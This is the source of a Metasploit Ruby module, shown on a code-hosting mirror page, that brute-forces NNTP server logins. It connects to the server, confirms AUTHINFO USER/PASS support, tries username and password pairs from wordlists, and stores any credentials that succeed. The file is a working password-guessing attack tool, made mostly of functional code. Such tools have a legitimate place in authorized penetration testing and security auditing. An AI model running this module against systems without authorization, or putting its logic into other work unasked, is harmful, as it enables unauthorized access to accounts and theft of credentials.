CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/nntp/nntp_login.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Auxiliary::Report7include Msf::Auxiliary::AuthBrute8include Msf::Auxiliary::Scanner9include Msf::Exploit::Remote::Tcp1011def initialize(info = {})12super(update_info(info,13'Name' => 'NNTP Login Utility',14'Description' => %q{15This module attempts to authenticate to NNTP services16which support the AUTHINFO authentication extension.1718This module supports AUTHINFO USER/PASS authentication,19but does not support AUTHINFO GENERIC or AUTHINFO SASL20authentication methods.21},22'Author' => 'bcoles',23'License' => MSF_LICENSE,24'References' => [ [ 'CVE', '1999-0502' ], # Weak password25[ 'URL', 'https://datatracker.ietf.org/doc/html/rfc3977' ],26[ 'URL', 'https://datatracker.ietf.org/doc/html/rfc4642' ],27[ 'URL', 'https://datatracker.ietf.org/doc/html/rfc4643' ] ]))28register_options(29[30Opt::RPORT(119),31OptPath.new('USER_FILE', [ false, 'The file that contains a list of probable usernames.',32File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_users.txt') ]),33OptPath.new('PASS_FILE', [ false, 'The file that contains a list of probable passwords.',34File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt') ])35])36end3738def run_host(ip)39begin40connect41return :abort unless nntp?42return :abort unless supports_authinfo?4344report_service :host => rhost,45:port => rport,46:proto => 'tcp',47:name => 'nntp'48disconnect4950each_user_pass { |user, pass| do_login user, pass }51rescue ::Interrupt52raise $ERROR_INFO53rescue EOFError, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout54print_error "#{peer} Connection failed"55return56rescue OpenSSL::SSL::SSLError => e57print_error "SSL negotiation failed: #{e}"58rescue => e59print_error "#{peer} Error: #{e.class} #{e} #{e.backtrace}"60return61ensure62disconnect63end64end6566def nntp?67banner = sock.get_once6869if !banner70vprint_error "#{peer} No response"71return false72end7374if banner !~ /^200/75print_error 'Unexpected reply'76return false77end7879vprint_status 'Server is a NTTP server'80vprint_status "Banner: #{banner}"81true82end8384def supports_authinfo?85sock.put "HELP\r\n"86res = sock.get(-1)87code = res.scan(/\A(\d+)\s/).flatten.first.to_i8889if code.nil?90print_error 'Server is not a NNTP server'91return false92end9394if code == 48095vprint_warning 'Authentication is required before listing authentication capabilities.'96return true97end9899if code == 100 && res =~ /authinfo/i100vprint_status 'Server supports AUTHINFO'101return true102end103104print_error 'Server does not support AUTHINFO'105false106end107108def do_login(user, pass)109vprint_status "Trying username:'#{user}' with password:'#{pass}'"110111begin112connect113sock.get_once114115sock.put "AUTHINFO USER #{user}\r\n"116res = sock.get_once117unless res118vprint_error "#{peer} No response"119return :abort120end121122code = res.scan(/\A(\d+)\s/).flatten.first.to_i123if code != 381124vprint_error "#{peer} Unexpected reply. Skipping user..."125return :skip_user126end127128sock.put "AUTHINFO PASS #{pass}\r\n"129res = sock.get_once130unless res131vprint_error "#{peer} No response"132return :abort133end134135code = res.scan(/\A(\d+)\s/).flatten.first.to_i136if code == 452 || code == 481137vprint_error "#{peer} Login failed"138return139elsif code == 281140print_good "#{peer} Successful login with: '#{user}' : '#{pass}'"141report_cred ip: rhost,142port: rport,143service_name: 'nntp',144user: user,145password: pass,146proof: code.to_s147return :next_user148else149vprint_error "#{peer} Failed login as: '#{user}' - Unexpected reply: #{res.inspect}"150return151end152rescue EOFError, ::Rex::ConnectionError, ::Errno::ECONNREFUSED, ::Errno::ETIMEDOUT153print_error 'Connection failed'154return155rescue OpenSSL::SSL::SSLError => e156print_error "SSL negotiation failed: #{e}"157return :abort158end159rescue => e160print_error "Error: #{e}"161return nil162ensure163disconnect164end165166def report_cred(opts)167service_data = { address: opts[:ip],168port: opts[:port],169service_name: opts[:service_name],170protocol: 'tcp',171workspace_id: myworkspace_id }172173credential_data = { origin_type: :service,174module_fullname: fullname,175username: opts[:user],176private_data: opts[:password],177private_type: :password }.merge service_data178179login_data = { last_attempted_at: DateTime.now,180core: create_credential(credential_data),181status: Metasploit::Model::Login::Status::SUCCESSFUL,182proof: opts[:proof] }.merge service_data183184create_credential_login login_data185end186end187188189